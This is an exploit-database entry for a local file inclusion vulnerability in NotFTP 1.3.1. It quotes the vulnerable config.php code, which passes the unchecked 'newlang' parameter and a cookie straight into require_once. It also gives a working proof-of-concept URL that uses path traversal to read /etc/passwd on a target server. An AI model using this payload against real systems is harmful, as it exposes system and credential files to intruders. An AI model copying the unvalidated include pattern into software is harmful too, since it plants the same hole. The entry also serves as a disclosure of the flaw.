NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability

2009-04-21T00:00:00
ID 1337DAY-ID-5083
Type zdt
Reporter Kacper
Modified 2009-04-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability
=========================================================


NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

========= 



#  0day.today [2018-03-01]  #